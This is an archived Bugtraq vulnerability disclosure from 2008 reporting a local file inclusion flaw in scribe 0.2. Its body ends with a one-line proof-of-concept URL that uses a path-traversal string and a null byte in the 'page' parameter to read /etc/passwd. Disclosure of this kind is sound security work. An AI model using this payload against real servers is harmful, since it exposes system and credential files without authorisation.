scribe 0.2 local file inclusion vulnerability
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: scribe 0.2 local file inclusion vulnerability
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Thu, 14 Feb 2008 20:58:54 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=KjNVJkSJTTYM20XLzZTynYO75F5fsnPe5yCoYx2gEVQ=; b=X+U1tb4js04ExpkCNBM8TKc3f9x6n+IoVDaSYd9FvGQRQ59svKoxf/P/imSL4UjRiLcp2CqpaeMUEjjydDZqb0RImXXpO8PJTsu2qpzo5rk35jbA9F4xApr/2ZlezEzEcDn9qHyH+vs3C/2TwWxR9m08e7+z0GCvCAlSFtCViHA=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=NduAoyb1h0o0EVikrbSRjuhE8SJhdMF2+jizaCjgTRyhUEl/CZN+6oTIaJouQO0K7o7ts88ZXvucRIVO8i3rGi/NnxxHskb/KQvyZgQjIaRKMJPsEvz0+Md6lpyCno3n7/PUD4z1MClopGW7jTguLOwgEKya8H27ujAMZVt7jok=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
scribe 0.2 local file inclusion vulnerability
download http://sourceforge.net/projects/scribe/
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00